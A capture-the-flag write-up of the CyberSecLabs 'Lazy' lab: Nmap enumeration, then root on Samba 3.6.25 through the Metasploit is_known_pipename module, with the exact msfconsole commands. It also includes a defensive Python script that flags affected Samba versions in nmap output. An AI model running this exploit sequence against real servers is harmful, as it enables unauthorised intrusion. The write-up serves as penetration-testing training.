CyberSecLabs-Lazy
This is my 9th write-up, and I will be discussing my experience with the machine "Lazy" from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing. Lazy was a super easy machine: with some googling on the exposed Samba version we find a Metasploit module that gives root access to the machine.
Step 1: Enumeration
I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for a second scan type. It does not hurt to run two different types of Nmap scans, because one scan may give you more than the other. The scan used default scripts (-sC) and version detection (-sV).
I used the top-to-bottom method when reading my scan results. SSH on port 22 is usually not a great one to start off with, unless it has a vulnerable version exposed; then you can start with it and see what you find. I started with port 80, which is always the port I like to start with if it's available. I visited http://172.31.1.1 and saw that it's running Nginx.
I did some googling on the version of Nginx found in my Nmap scan and found nothing interesting that could be exploited. I then proceeded to kick off a directory-busting tool against http://172.31.1.1 to see what directories were exposed. This thing ran forever with no interesting results. I went back to my Nmap scan results and, working my way down the list, saw that this thing has Samba running on ports 139 and 445 with a version exposed (Samba 3.6.25). I did a searchsploit in my terminal and found an exploit available.
I then googled the exploit name followed by the keyword "rapid7" to see how I could use it in Metasploit. I would have done a manual exploit if one was available. This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4.
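The version range above is the thing worth checking on every Samba host in an inventory, not just this lab box. The following is an added example (my own code, not from the write-up or from Metasploit) that pulls the exact Samba version out of nmap -sV service lines and says whether it falls inside that range. It assumes that 4.4.14, 4.5.10 and 4.6.4 are the first patched releases of their branches (the Samba project's fix versions), so those three are not flagged, and it treats nmap's fuzzy "3.X - 4.X" guesses as "unknown" rather than silently passing them.

```python
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Range as described in the write-up: 3.5.0 up to the 4.4.14 / 4.5.10 / 4.6.4 releases.
# ASSUMPTION: those three versions are the first patched releases in their branches
# (the Samba fix versions), so they themselves are treated as not affected.
FIRST_AFFECTED: Version = (3, 5, 0)
FIXED_IN_BRANCH = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}
LAST_BRANCH_WITHOUT_FIX = (4, 3)  # every 4.3.x and earlier (back to 3.5.0) is affected

# nmap prints e.g. "Samba smbd 3.6.25 (workgroup: WORKGROUP)" or "Samba 4.3.11-Ubuntu"
VERSION_RE = re.compile(r"Samba(?: smbd)?\s+(\d+)\.(\d+)\.(\d+)")


def parse_samba_version(line: str) -> Optional[Version]:
    """Return the exact Samba version from a service line, or None when nmap could
    only produce a fuzzy guess such as 'Samba smbd 3.X - 4.X'."""
    m = VERSION_RE.search(line)
    return tuple(int(x) for x in m.groups()) if m else None  # type: ignore[return-value]


def is_affected(version: Version) -> bool:
    """True if the version lies inside the range the write-up quotes for the module."""
    if version < FIRST_AFFECTED:
        return False
    branch = version[:2]
    if branch <= LAST_BRANCH_WITHOUT_FIX:
        return True
    if branch in FIXED_IN_BRANCH:
        return version < FIXED_IN_BRANCH[branch]
    return False  # branches newer than 4.6 are outside the described range


def triage(scan_lines: List[str]) -> List[Tuple[int, str]]:
    """Map each open Samba port in nmap -sV output to affected / not affected / unknown."""
    findings = []
    for line in scan_lines:
        m = re.match(r"(\d+)/tcp\s+open\s", line)
        if not m or "Samba" not in line:
            continue
        version = parse_samba_version(line)
        if version is None:
            status = "unknown (verify manually)"
        else:
            status = "affected" if is_affected(version) else "not affected"
        findings.append((int(m.group(1)), status))
    return findings


# Constructed sample modelled on the scan described in the write-up (not real output).
SAMPLE_SCAN = [
    "22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8",
    "80/tcp  open  http        nginx",
    "139/tcp open  netbios-ssn Samba smbd 3.6.25 (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.6.25 (workgroup: WORKGROUP)",
]
```

Feed it `nmap -sV` lines from your own hosts; an "unknown" result means nmap could not fingerprint the exact build and the version has to be confirmed from the package manager on the box.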
Step 2: Exploitation
I fired up Metasploit on my Kali machine and ran the following commands:
sudo msfconsole
use exploit/linux/samba/is_known_pipename
set payload cmd/unix/interact
set RHOSTS 172.31.1.1
run
After launching the run command, I typed whoami and was root ;)